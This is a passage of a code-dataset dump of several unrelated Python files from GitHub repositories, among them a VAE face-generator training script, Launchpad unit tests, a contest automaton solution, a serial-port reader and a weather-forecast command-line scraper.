LoadCelebFaces(transform=image_transform)\r\ntrain_loader = DataLoader(train_data, batch_size=64, shuffle=True)\r\n\r\nprint(f'''Training Data Size: {len(train_data)}\\n''')\r\n\r\ncuda = torch.cuda.is_available()\r\n\r\nmodel = VAE()\r\nif cuda:\r\n model = model.cuda()\r\nprint_model_architecture = lambda model: f'\\nModel Architecture' + '='*32 + '\\n' + f'{model}\\n' + '='*32 + '\\n'\r\nprint(print_model_architecture(model))\r\n\r\ndef loss_function(reconstructed_x, x, mean, logvar):\r\n BCE = F.binary_cross_entropy(reconstructed_x, x, reduction='sum')\r\n KLD = -0.5 * torch.sum(1 + logvar - mean.pow(2) - logvar.exp())\r\n\r\n return BCE + KLD\r\n\r\ndef plot_img(image, epoch, cmap='gray'):\r\n plt.imshow(image.permute(1, 2, 0), cmap=cmap)\r\n plt.axis('off')\r\n plt.title(f'Generated Image after {epoch} epochs')\r\n plt.show()\r\n\r\ndef train(model, train, EPOCHS):\r\n print('Model Training...')\r\n model.train()\r\n training_loss = []\r\n\r\n optimizer = optim.Adam(model.parameters(), lr=0.001)\r\n version = 1\r\n\r\n for epoch in range(EPOCHS):\r\n train_loss = 0.0\r\n for i, data in enumerate(train):\r\n\r\n optimizer.zero_grad()\r\n\r\n if cuda:\r\n data = data.cuda()\r\n\r\n out, mean, std = model(data)\r\n loss = loss_function(out, data.float(), mean, std)\r\n loss.backward()\r\n\r\n train_loss += loss.item()\r\n\r\n optimizer.step()\r\n\r\n if i % 500 == 499:\r\n print(f'Epoch {epoch+1}, Batch [{i+1}/{len(train)}], Training Loss {loss.item()/i+1}')\r\n\r\n average_train_loss = train_loss / len(train)\r\n print(f'Training Set Loss {epoch+1}: {round(average_train_loss, 4)}')\r\n training_loss.append(average_train_loss)\r\n\r\n if epoch % 25 == 0:\r\n torch.save(model.state_dict(), f\"./models/face_generatorE{epoch+1}v{version}.pt\")\r\n version += 1\r\n \r\n model.eval()\r\n with torch.no_grad():\r\n z = torch.randn(BATCH_SIZE, 800)\r\n if cuda:\r\n z = z.cuda()\r\n output_img = model.decode(z).cpu()\r\n print(output_img.shape)\r\n\r\n grid_img = make_grid(output_img, nrow=8)\r\n plot_img(grid_img, epoch, cmap='gray')\r\n model.train()\r\n return model, training_loss\r\n\r\nmodel, training_loss = train(model, train_loader, 100)\r\ntorch.save(model.state_dict(), \"./models/face_generatorE100v5.pt\")\r\n","repo_name":"ppvalluri09/Face-Generation-with-Variational-Autoencoders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39958458638","text":"def maximum(A, n):\n\t\n\tif (n == 0):\n\t\treturn A[n]\n\n\tmax_value = maximum(A, n-1)\n\n\tif (max_value > A[n]):\n\t\treturn max_value\n\telse: \n\t\treturn A[n]\n\nA = [8,2,4,7,1]\n\nprint(maximum(A, 4))\n","repo_name":"prateekiiest/sage-covid","sub_path":"code_scripts/max_2.py","file_name":"max_2.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36046230174","text":"__metaclass__ = type\n\nfrom storm.store import Store\nfrom zope.component import getUtility\nfrom zope.event import notify\nfrom zope.security.proxy import removeSecurityProxy\n\nfrom lp.app.enums import InformationType\nfrom lp.app.interfaces.launchpad import ILaunchpadCelebrities\nfrom lp.buildmaster.interfaces.buildfarmjob import IBuildFarmJobOld\nfrom lp.buildmaster.interfaces.buildqueue import IBuildQueueSet\nfrom lp.buildmaster.model.buildqueue import BuildQueue\nfrom lp.code.interfaces.branch import IBranchSet\nfrom lp.code.interfaces.branchjob import IBranchJob\nfrom lp.code.model.branchjob import BranchJob\nfrom lp.code.model.directbranchcommit import DirectBranchCommit\nfrom lp.codehosting.scanner import events\nfrom lp.services.database.interfaces import IStore\nfrom lp.services.job.model.job import Job\nfrom lp.testing import (\n TestCaseWithFactory,\n verifyObject,\n )\nfrom lp.testing.layers import (\n LaunchpadZopelessLayer,\n ZopelessDatabaseLayer,\n )\nfrom lp.translations.interfaces.translations import (\n TranslationsBranchImportMode,\n )\nfrom lp.translations.interfaces.translationtemplatesbuildjob import (\n ITranslationTemplatesBuildJobSource,\n )\nfrom lp.translations.model.translationtemplatesbuildjob import (\n TranslationTemplatesBuildJob,\n )\n\n\ndef get_job_id(job):\n \"\"\"Peek inside a `Job` and retrieve its id.\"\"\"\n return removeSecurityProxy(job).id\n\n\nclass TestTranslationTemplatesBuildJob(TestCaseWithFactory):\n \"\"\"Test `TranslationTemplatesBuildJob`.\"\"\"\n\n layer = ZopelessDatabaseLayer\n\n def setUp(self):\n super(TestTranslationTemplatesBuildJob, self).setUp()\n self.jobset = getUtility(ITranslationTemplatesBuildJobSource)\n self.branch = self.factory.makeBranch()\n self.specific_job = self.jobset.create(self.branch)\n\n def test_new_TranslationTemplatesBuildJob(self):\n # TranslationTemplateBuildJob implements IBuildFarmJobOld,\n # and IBranchJob.\n verifyObject(IBranchJob, self.specific_job)\n verifyObject(IBuildFarmJobOld, self.specific_job)\n\n # Each of these jobs knows the branch it will operate on.\n self.assertEqual(self.branch, self.specific_job.branch)\n\n def test_has_Job(self):\n # Associated with each TranslationTemplateBuildJob is a Job.\n base_job = self.specific_job.job\n self.assertIsInstance(base_job, Job)\n\n # From a Job, the TranslationTemplatesBuildJobSource can find the\n # TranslationTemplatesBuildJob back for us.\n specific_job_for_base_job = removeSecurityProxy(\n TranslationTemplatesBuildJob.getByJob(base_job))\n self.assertEqual(self.specific_job, specific_job_for_base_job)\n\n def test_has_BuildQueue(self):\n # There's also a BuildQueue item associated with the job.\n queueset = getUtility(IBuildQueueSet)\n job_id = get_job_id(self.specific_job.job)\n buildqueue = queueset.get(job_id)\n\n self.assertIsInstance(buildqueue, BuildQueue)\n self.assertEqual(job_id, get_job_id(buildqueue.job))\n\n def test_BuildQueue_for_arch(self):\n # BuildQueue entry is for i386 (default Ubuntu) architecture.\n queueset = getUtility(IBuildQueueSet)\n job_id = get_job_id(self.specific_job.job)\n buildqueue = queueset.get(job_id)\n\n ubuntu = getUtility(ILaunchpadCelebrities).ubuntu\n self.assertEquals(\n ubuntu.currentseries.nominatedarchindep.processor,\n buildqueue.processor)\n\n def test_score(self):\n # For now, these jobs always score themselves at 2510. In the\n # future however the scoring system is to be revisited.\n self.assertEqual(2510, self.specific_job.score())\n\n def test_cleanUp(self):\n # TranslationTemplatesBuildJob has its own customized cleanup\n # behaviour, since it's actually a BranchJob.\n job = removeSecurityProxy(self.specific_job.job)\n buildqueue = IStore(BuildQueue).find(BuildQueue, job=job).one()\n\n job_id = job.id\n store = Store.of(job)\n branch_name = self.branch.unique_name\n\n buildqueue.destroySelf()\n\n # BuildQueue is gone.\n self.assertIs(\n None, store.find(BuildQueue, BuildQueue.job == job_id).one())\n # Job is gone.\n self.assertIs(None, store.find(Job, Job.id == job_id).one())\n # TranslationTemplatesBuildJob is gone.\n self.assertIs(None, TranslationTemplatesBuildJob.getByJob(job_id))\n # Branch is still here.\n branch_set = getUtility(IBranchSet)\n self.assertEqual(self.branch, branch_set.getByUniqueName(branch_name))\n\n\nclass FakeTranslationTemplatesJobSource(TranslationTemplatesBuildJob):\n \"\"\"Fake utility class.\n\n Allows overriding of _hasPotteryCompatibleSetup.\n\n How do you fake a utility that is implemented as a class, not a\n factory? By inheriting from `TranslationTemplatesJob`, this class\n \"copies\" the utility. But you can make it fake the utility's\n behavior by setting an attribute of the class (not an object!) at\n the beginning of every test.\n \"\"\"\n # Fake _hasPotteryCompatibleSetup, and if so, make it give what\n # answer?\n fake_pottery_compatibility = None\n\n @classmethod\n def _hasPotteryCompatibleSetup(cls, branch):\n if cls.fake_pottery_compatibility is None:\n # No fake compatibility setting call the real method.\n return TranslationTemplatesBuildJob._hasPotteryCompatibleSetup(\n branch)\n else:\n # Fake pottery compatibility.\n return cls.fake_pottery_compatibility\n\n\nclass TestTranslationTemplatesBuildJobSource(TestCaseWithFactory):\n \"\"\"Test `TranslationTemplatesBuildJobSource`.\"\"\"\n\n layer = LaunchpadZopelessLayer\n\n def setUp(self):\n super(TestTranslationTemplatesBuildJobSource, self).setUp()\n self.jobsource = FakeTranslationTemplatesJobSource\n self.jobsource.fake_pottery_compabitility = None\n\n def tearDown(self):\n self._fakePotteryCompatibleSetup(compatible=None)\n super(TestTranslationTemplatesBuildJobSource, self).tearDown()\n\n def _makeTranslationBranch(self, fake_pottery_compatible=None):\n \"\"\"Create a branch that provides translations for a productseries.\"\"\"\n if fake_pottery_compatible is None:\n self.useBzrBranches(direct_database=True)\n branch, tree = self.create_branch_and_tree()\n else:\n branch = self.factory.makeAnyBranch()\n product = removeSecurityProxy(branch.product)\n trunk = product.getSeries('trunk')\n trunk.branch = branch\n trunk.translations_autoimport_mode = (\n TranslationsBranchImportMode.IMPORT_TEMPLATES)\n\n self._fakePotteryCompatibleSetup(fake_pottery_compatible)\n\n return branch\n\n def _fakePotteryCompatibleSetup(self, compatible=True):\n \"\"\"Mock up branch compatibility check.\n\n :param compatible: Whether the mock check should say that\n branches have a pottery-compatible setup, or that they\n don't.\n \"\"\"\n self.jobsource.fake_pottery_compatibility = compatible\n\n def test_baseline(self):\n utility = getUtility(ITranslationTemplatesBuildJobSource)\n verifyObject(ITranslationTemplatesBuildJobSource, utility)\n\n def test_generatesTemplates(self):\n # A branch \"generates templates\" if it is a translation branch\n # for a productseries that imports templates from it; is not\n # private; and has a pottery compatible setup.\n # For convenience we fake the pottery compatibility here.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n self.assertTrue(self.jobsource.generatesTemplates(branch))\n\n def test_not_pottery_compatible(self):\n # If pottery does not see any files it can work with in the\n # branch, generatesTemplates returns False.\n branch = self._makeTranslationBranch()\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_branch_not_used(self):\n # We don't generate templates branches not attached to series.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n trunk = branch.product.getSeries('trunk')\n removeSecurityProxy(trunk).branch = None\n\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_not_importing_templates(self):\n # We don't generate templates when imports are disabled.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n trunk = branch.product.getSeries('trunk')\n removeSecurityProxy(trunk).translations_autoimport_mode = (\n TranslationsBranchImportMode.NO_IMPORT)\n\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_private_branch(self):\n # We don't generate templates for private branches.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n removeSecurityProxy(branch).information_type = (\n InformationType.USERDATA)\n self.assertFalse(self.jobsource.generatesTemplates(branch))\n\n def test_scheduleTranslationTemplatesBuild_subscribed(self):\n # If the feature is enabled, a TipChanged event for a branch that\n # generates templates will schedule a templates build.\n branch = self._makeTranslationBranch()\n removeSecurityProxy(branch).last_scanned_id = 'null:'\n commit = DirectBranchCommit(branch)\n commit.writeFile('POTFILES.in', 'foo')\n commit.commit('message')\n notify(events.TipChanged(branch, None, False))\n branchjobs = list(TranslationTemplatesBuildJob.iterReady())\n self.assertEqual(1, len(branchjobs))\n self.assertEqual(branch, branchjobs[0].branch)\n\n def test_scheduleTranslationTemplatesBuild(self):\n # If the feature is enabled, scheduleTranslationTemplatesBuild\n # will schedule a templates build whenever a change is pushed to\n # a branch that generates templates.\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n self.jobsource.scheduleTranslationTemplatesBuild(branch)\n\n store = IStore(BranchJob)\n branchjobs = list(store.find(BranchJob, BranchJob.branch == branch))\n self.assertEqual(1, len(branchjobs))\n self.assertEqual(branch, branchjobs[0].branch)\n\n def test_create(self):\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n\n specific_job = self.jobsource.create(branch)\n\n # A job is created with the branch URL in its metadata.\n metadata = specific_job.metadata\n self.assertIn('branch_url', metadata)\n url = metadata['branch_url']\n head = 'http://'\n self.assertEqual(head, url[:len(head)])\n tail = branch.name\n self.assertEqual(tail, url[-len(tail):])\n\n def test_create_with_build(self):\n branch = self._makeTranslationBranch(fake_pottery_compatible=True)\n specific_job = self.jobsource.create(branch, testing=True)\n naked_job = removeSecurityProxy(specific_job)\n self.assertEquals(naked_job._constructed_build, specific_job.build)\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/translations/tests/test_translationtemplatesbuildjob.py","file_name":"test_translationtemplatesbuildjob.py","file_ext":"py","file_size_in_byte":11207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5991266367","text":"#!/usr/bin/python\nimport sys\nfrom collections import *\nfrom itertools import *\n\nsteps,alphabet = sys.stdin.readline().split()\nsteps = int(steps)\nrules = sys.stdin.readline()\n\nclass Auto:\n def __init__(self,n):\n self.nb=n\n self.out=[dict() for _ in range(n)]\n self.defout=[-1 for _ in range(n)]\n self.fin = [] \n \n @classmethod\n def from_rule(cls,rule):\n res = cls(len(rule)-1)\n fail = 0\n dec = 0\n for i in range(res.nb):\n if rule[i]=='>':\n dec=1\n fail=i\n else:\n if fail != i:\n res.out[i][rule[fail+dec]]=(fail+1)%res.nb\n res.out[i][rule[i+dec]]=(i+1)%res.nb\n res.defout[i]=fail\n if fail == 0:\n res.fin.append(i)\n # print(\" ====== FROM \"+rule+\" ===== \")\n # res.show()\n return res\n\n @classmethod\n def product(cls,a,b):\n if b is None:\n return a\n res = cls(a.nb*b.nb)\n for sa in range(a.nb):\n for sb in range(b.nb):\n s=sa*b.nb+sb\n res.defout[s] = a.defout[sa]*b.nb+b.defout[sb] \n for (c,ta) in a.out[sa].items():\n if c in b.out[sb]:\n res.out[s][c] = ta*b.nb+b.out[sb][c]\n else:\n res.out[s][c] = ta*b.nb+b.defout[sb]\n for (c,tb) in b.out[sb].items():\n if not (c in a.out[sa]):\n res.out[s][c] = a.defout[sa]*b.nb+tb\n res.fin = [ sa*b.nb+sb for (sa,sb) in product(a.fin,b.fin)]\n # print(\" ====== PRODUCT ===== \")\n # res.show()\n return res\n\n @classmethod\n def from_ruleset(cls,rules):\n if len(rules) == 1:\n return cls.from_rule(rules[0])\n else:\n return cls.trim(cls.product(cls.from_ruleset(rules[:len(rules)//2]),\n cls.from_ruleset(rules[len(rules)//2:]))) \n\n def show(self):\n print(\"Auto with \"+str(self.nb)+\" states\")\n for i in range(self.nb):\n for (c,s) in self.out[i].items():\n print( str(i) + \"-- \"+c+\" --> \"+str(s) )\n print(\"def ---> \"+str(self.defout[i]))\n print(\"Finals: \"+str(self.fin))\n\n @classmethod\n def trim(cls,a):\n res = cls(a.nb)\n accessible_states = [0]\n cur = 0\n remap = dict()\n remap[0]=0\n while cur < len(accessible_states):\n for (c,disc) in a.out[accessible_states[cur]].items():\n if disc not in remap:\n remap[disc] = len(accessible_states)\n accessible_states.append(disc)\n res.out[cur][c] = remap[disc]\n if a.defout[accessible_states[cur]] not in remap:\n remap[a.defout[accessible_states[cur]]] = len(accessible_states)\n accessible_states.append(a.defout[accessible_states[cur]])\n res.defout[cur] = remap[a.defout[accessible_states[cur]]]\n cur+=1\n res.nb = cur\n \n for i in a.fin:\n if i in remap:\n res.fin.append(remap[i])\n # print(\" ====== TRIM ===== \")\n # res.show()\n return res\n\na = Auto.trim(Auto.from_ruleset(rules.strip().split('|')))\n\ndef_tr = [0]*a.nb\ncount_tr = [0]*a.nb\none_tr = [[] for _ in range(a.nb)]\nfor s1 in range(a.nb):\n for (c,s2) in a.out[s1].items():\n one_tr[s1].append(s2)\n count_tr[s1] = len(alphabet)-len(a.out[s1])\n def_tr[s1] = a.defout[s1]\n\ncur=[0]*a.nb\nfor i in a.fin:\n cur[i]=1\n\nfor i in range(steps):\n nxt=[0]*a.nb\n for f in range(a.nb):\n nxt[f] = cur[def_tr[f]]*count_tr[f]\n for t in one_tr[f]:\n nxt[f]+=cur[t]\n for i in range(a.nb):\n cur[i] = nxt[i] % 10000000\nprint (cur[0])\n","repo_name":"romeorizzi/SWERC_2_CMS","sub_path":"swerc_original/kabobs/submissions/accepted/sol_louis_good.py","file_name":"sol_louis_good.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38294502585","text":"#program that finds the min and max value in list \nli=[-5,6,1,2,8,0,99]\nmax=li[0]\nmin=li[0]\nfor i in range(1,len(li)):\n if li[i] > max:\n max = li[i]\n if li[i] < min :\n min = li[i]\nprint(min,max)","repo_name":"tahe-ba/Programmation-Python","sub_path":"serie/serie 3 liste/code/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1503886439","text":"\nimport aztec.build_half_coin as bhc\n\nimport triangle.array_util as util\n\ncol_dict = dict()\ncol_dict[1] =[[k, ] for k in range(0, 2)]\n\n\n# columns must weakly increase\ndef get_column(size):\n if not size in col_dict:\n prev_list = get_column(size-1)\n new_list = []\n for idx in range(size+1):\n for prev in prev_list:\n if idx <= prev[0] or (idx == size and prev[0] == size-1):\n new_list.append([idx,] + prev)\n col_dict[size] = new_list\n\n return col_dict[size]\n\n\n# initialize the ocean dictionary\npst2_dict = dict()\npst2_dict[1] = [[[k, ],] for k in range(0,2)]\n\n# no constraints for columns?\ndef get_pst2(size):\n if not size in pst2_dict:\n prev_list = get_pst2(size-1)\n col_list = get_column(size)\n new_list = []\n\n for c in col_list:\n for p in prev_list:\n new_list.append([c,] + p)\n\n pst2_dict[size] = new_list\n\n return pst2_dict[size]\n\n\ntemp = get_pst2(2)\n\n#for t in temp:\n# print(t)\n\n\ndef flip(triangle):\n first_col = triangle[0]\n new_triangle = [[x,] for x in first_col]\n for row in triangle[1 : len(triangle)]:\n for idx in range(len(row)):\n new_triangle[idx].append(row[idx])\n\n return new_triangle\n\n\nfor size in range(2,5):\n pst2_list = get_pst2(size)\n pst2_list = [flip(t) for t in pst2_list]\n\n ocean_list = bhc.get_coin_oceans(size)\n stack_list = [ bhc.ocean_to_stack2(t) for t in ocean_list]\n\n stack_name_list = [str(s) for s in stack_list]\n\n\n #print('missing in pst:')\n #for p in pst2_list:\n # util.print_array(p)\n # if not str(p) in stack_name_list:\n # for row in p:\n # print(row)\n # print('---------')\n\n print(len(pst2_list))\n print(len(stack_list))\n\n # for p in stack_list:\n # for row in p:\n # print(row)\n # print('---------')\n\n util.print_block_totals(pst2_list)","repo_name":"mathbeveridge/asm","sub_path":"aztec/build_permutation_stack2.py","file_name":"build_permutation_stack2.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27844912578","text":"#!python\nimport time\nimport cgi\nfrom serial import Serial\nimport subprocess\nimport re\nimport threading\n\ng_values = []\nclass myThread(threading.Thread):\n def _init_(self,threadID,portname):\n threading.Thread._init_(self)\n self.threadID = threadID\n self.portname = portname\n def run(self):\n threadLock.acquire()\n uart1(self.threadID,self.portname)\n threadLock.release()\n\ndef uart1(name,portName):\n ser = Serial(portName, baudrate=9600, bytesize=8, parity='N', stopbits=1, timeout=None)\n print(\"connected to: \" + ser.portstr)\n while True:\n line = ser.readline(ser.inWaiting()).decode('utf-8')[:-2]\n if line:\n t = line.split(\",\")\n line2 = float(t[5])\n if line2 > 0:\n do_fuzzy(line2)\n ser.close()\n\ndef do_fuzzy(value):\n print(value)\n\nthreadLock=threading.Lock()\nthreads = []\n\n#create new threads\nthread1 = threading.Thread(target = uart1, args=(\" uart4\",'/dev/ttyS4'))\nthread2 = threading.Thread(target = uart1, args=(\"uart3\",'/dev/ttyS3'))\nthread3 = threading.Thread(target = uart1, args=(\"uart7\",'/dev/ttyS6'))\n\n#start new Thread!\nthread1.start()\nthread2.start()\nthread3.start()\n\n#add threads to thread list\nthreads.append(thread1)\nthreads.append(thread2)\nthreads.append(thread3)\n\n#wait for all threads to complete\nfor t in threads:\n t.join()\n","repo_name":"reyueei/voltCtrlFLC","sub_path":"SRC/serialReading.py","file_name":"serialReading.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71174896193","text":"import os; os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"1\"\nimport nodetails as nd\nfrom nodetails import ndabs, util, prep\nfrom nodetails import metrics\n\n\ndef score_validation_set(abs_model, x_val, y_val, lexicon,\n item_range=(0, 1), depug_output=False):\n x_tkn, y_tkn, x_len, y_len = lexicon\n\n def decode_validation_seq(it):\n result = ndabs.decode_sequence(it.reshape(1, x_len), abs_model)\n assert result, f\"Empty result of type {type(result)} at item #{it}\"\n return result\n\n rouge1 = []\n rouge2 = []\n rougeL = []\n for i in range(*item_range):\n sum_orig = (ndabs.seq2text(y_val[i], y_tkn).replace(\"\", \"\")\n .replace(\"\", \"\")\n .strip())\n sum_pred = decode_validation_seq(x_val[i])\n scores = metrics.get_rogue_f1_score(sum_pred, sum_orig)\n rouge1.append(scores[\"rouge-1\"])\n rouge2.append(scores[\"rouge-2\"])\n rougeL.append(scores[\"rouge-l\"])\n if depug_output:\n print(\"\\nReview #%s: \" % i)\n print(\"rouge-1 : %.7f\" % scores[\"rouge-1\"])\n print(\"rouge-2 : %.7f\" % scores[\"rouge-2\"])\n print(\"rouge-l : %.7f\" % scores[\"rouge-l\"])\n\n def mean(L):\n return sum(L)/len(L)\n\n return mean(rouge1), mean(rouge2), mean(rougeL)\n\n\nif __name__ == \"__main__\":\n nd.enable_vram_growth()\n nd.set_debug(True)\n\n dataset_name = \"wikihow\"\n x_len = 120\n y_len = 15\n column_names = {\"text\": \"text\", \"title\": \"sum\"}\n\n dataset = util.cached_read_dataset_csv(\"../data/wikihow_articles/wikihowAll.csv\",\n nrows=1000,\n renaming_map=column_names)\n training_data, lexicon = prep.prepare_training_set(dataset,\n x_len, y_len,\n split=.1)\n\n abs_model = ndabs.load_model(\"../data/_models/nodetails--wikihow--120-15--1000.model\")\n scores = score_validation_set(\n abs_model, training_data.x_val, training_data.y_val, lexicon,\n item_range=(0, 99))\n\n print(scores)\n print(\"Done\")\n\n# END OF test_metrics.py\n","repo_name":"bozdogan/nodetails","sub_path":"code/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72891983235","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n#file: weather.py\r\n\r\n#windows , linux\r\n#pip install --user package_name\r\n#python3 -m pip install requests\r\n#python3 -m pip install BeautifulSoup4\r\n\r\n#freebsd (NCTU) using python3.4\r\n#python3.4 -m ensurepip --user\r\n#python3.4 -m pip install --user beautifulsoup4\r\n#python3.4 -m pip install --user requests\r\n\r\n\r\n\r\nimport argparse\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nimport os.path\r\nimport platform\r\n\r\n\r\n\r\n\r\ndef get_weather_data( searchname , unit ):\r\n temp_unit = \"F\"\r\n if unit == \"c\" or unit == \"C\":\r\n temp_unit = \"C\"\r\n\r\n unit = unit.lower()\r\n\r\n woeid_url = \"http://woeid.rosselliot.co.nz/lookup/\"+searchname\r\n r = requests.get(woeid_url)\r\n #print (r.text)\r\n soup_woeid = BeautifulSoup(r.text,\"html.parser\")\r\n\r\n woeid_list = soup_woeid.find_all(\"tr\" , \"woeid_row\")\r\n if not woeid_list:\r\n print(\"Can not find woeid of \"+searchname+\" !\")\r\n return None\r\n woeid = woeid_list[0]['data-woeid'] #index0: best correct woeid\r\n cityname = woeid_list[0]['data-city']\r\n\r\n\r\n\r\n#print( cityname )\r\n weather_url = \"https://weather.yahooapis.com/forecastrss?w={0}&u={1}\".format( woeid ,unit)\r\n#print(weather_url)\r\n weather_html = requests.get(weather_url).text\r\n#print(weather_html)\r\n\r\n\r\n soup_weather = BeautifulSoup( weather_html , \"html.parser\")\r\n\r\n\r\n #handle forecast\r\n forecast=[]\r\n for tag in soup_weather.find_all(\"yweather:forecast\" ):\r\n tmp_str=\"\"\r\n #convert abbrivate month to full month\r\n date_abbr = datetime.datetime.strptime(tag['date'] , \"%d %b %Y\").date()\r\n if platform.system() == \"Linux\" or platform.system() == \"FreeBSD\" :\r\n date_full= date_abbr.strftime(\"%-d %B %Y\") #hyphen for removimg leading zero\r\n else:\r\n date_full= date_abbr.strftime(\"%d %B %Y\")\r\n date_full += \" \"+tag['day']\r\n\r\n tmp_str = date_full+\" \"+tag['low']+\"~\"+tag['high']+temp_unit+\" \"+tag['text']\r\n\r\n forecast.append( tmp_str )\r\n\r\n #handle sunrise/sunset\r\n suntime = soup_weather.find(\"yweather:astronomy\")\r\n sunrise = datetime.datetime.strptime( suntime['sunrise'] ,\"%I:%M %p\" ).time()\r\n sunset = datetime.datetime.strptime( suntime['sunset'] , \"%I:%M %p\").time()\r\n\r\n\r\n #handle current weather\r\n current = soup_weather.find(\"yweather:condition\")\r\n\r\n city_info={}\r\n city_info['name'] = cityname\r\n\r\n city_info['current'] = cityname+\", \"+current['text']+\", \"+current['temp']+temp_unit\r\n city_info['forecast'] = forecast\r\n #add padding zero on hour\r\n city_info['suntime'] = \"sunrise: \"+sunrise.strftime('%I:%M %p').lower()+\", \"+\"sunset: \"+sunset.strftime('%I:%M %p').lower()\r\n\r\n\r\n return city_info\r\n\r\n#print(city_info['suntime'])\r\n\r\n#print ( soup.find_all(\"td\" , \"woeid\") )\r\n#for tag in soup.find_all(\"td\",\"woeid\"):\r\n# if tag.has_attr('class'):\r\n# print (tag)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n locations=[]\r\n temp_unit = None\r\n #argument setting\r\n\r\n parser = argparse.ArgumentParser(\"Weather Indicator\")\r\n group = parser.add_mutually_exclusive_group()\r\n\r\n parser.add_argument(\"-l\", type=str , help=\"location\" , dest=\"location\" , metavar='locations')\r\n parser.add_argument(\"-u\", type=str , help=\"temperature unit\", choices=['c','f'] , dest= \"unit\" ,metavar=\"unit\" )\r\n\r\n\r\n group.add_argument(\"-a\", help=\"equal to -c -d 5\", action=\"store_true\" , dest=\"all\" )\r\n\r\n\r\n group.add_argument(\"-c\", help=\"current condition\" , action=\"store_true\" , dest=\"current\")\r\n group.add_argument(\"-d\" ,help=\"forecast\", metavar=\"day\" , dest=\"forecast\")\r\n parser.add_argument(\"-s\", help=\"sunset/sunrise\" , action=\"store_true\", dest=\"sun\" )\r\n\r\n args = parser.parse_args()\r\n\r\n\r\n #check config file & set location\r\n if os.path.isfile(\"config.py\"):\r\n#print(\"config.py exists! \")\r\n temp_unit=\"F\"\r\n with open( \"config.py\" , \"r\") as filein:\r\n for line in filein:\r\n text = line.lstrip()\r\n if text[0] == \"#\": #ignore comment\r\n continue\r\n else:\r\n textlist = text.split(\"=\" , 1 )\r\n if textlist[0] == \"LOCATION\" or textlist[0] == \"location\":\r\n textlist[1] = textlist[1].replace(\"\\\"\" , \"\")\r\n locations = [ x.strip() for x in textlist[1].split(',')]\r\n#print(locations)\r\n elif textlist[0] == \"UNIT\" or textlist[0] == \"unit\":\r\n temp_unit = textlist[1].strip()\r\n temp_unit = temp_unit.replace(\"\\\"\" , \"\")\r\n if temp_unit not in ['c' ,'C' ,'f' ,'F']:\r\n print(\"temperature unit setting fail\")\r\n print(\"unit:['C'|'F'|'c'|'f']\")\r\n print(\"use default temperature unit\")\r\n else:\r\n temp_unit = temp_unit.upper()\r\n#print(\"Setting\"+temp_unit)\r\n else:\r\n print(\"config.py file format wrong\")\r\n print(\"Example:\")\r\n print(\"LOCATION: hsinchu\")\r\n print(\"UNIT: C\")\r\n\r\n\r\n#print(\"Setting\"+temp_unit)\r\n# print(args.location is None)\r\n#print( locations )\r\n if( ( args.location is None) and ( not locations ) ):\r\n print(\"Must specify location\")\r\n parser.print_help()\r\n exit()\r\n\r\n if( ( args.unit is None ) and ( temp_unit is None ) ) :\r\n print(\"Must specify type of information --no unit\") #no unit\r\n parser.print_help()\r\n exit()\r\n\r\n\r\n if args.all and args.forecast:\r\n print(\"argument conflict error !\")\r\n print(\"[-a] and [-d day] cannot be used at the same time\")\r\n exit()\r\n\r\n\r\n\r\n\r\n#print(args)\r\n if (args.all or args.current or args.forecast or args.sun ) == False:\r\n print(\"Must specify type of information --no [ -a | -c | -d ][ -s ]\")\r\n parser.print_help()\r\n exit()\r\n\r\n if args.forecast:\r\n day = int(args.forecast)\r\n if day < 1 or day >5:\r\n print(\"[-d day] day must be in range 1~5\")\r\n exit()\r\n\r\n if not (args.location is None):\r\n locations = [ x.strip() for x in args.location.split(',') ]\r\n\r\n if not (args.unit is None) :\r\n temp_unit=args.unit\r\n\r\n\r\n for city in locations:\r\n if not city: #empty city name\r\n continue\r\n\r\n info = get_weather_data( city , temp_unit )\r\n if not info: #return none --> cannot find woeid\r\n continue\r\n print( info['name'] )\r\n\r\n if args.all:\r\n print( info['current'] )\r\n for text in info['forecast']:\r\n print( text )\r\n elif args.current:\r\n print( info['current'] )\r\n\r\n if args.forecast:\r\n for i in range( 0 , int(args.forecast) ):\r\n print(info['forecast'][i])\r\n\r\n if args.sun:\r\n print( info['suntime'])\r\n\r\n\r\n\r\n\r\n #print(\"LOCATION:\"+str(locations) )\r\n 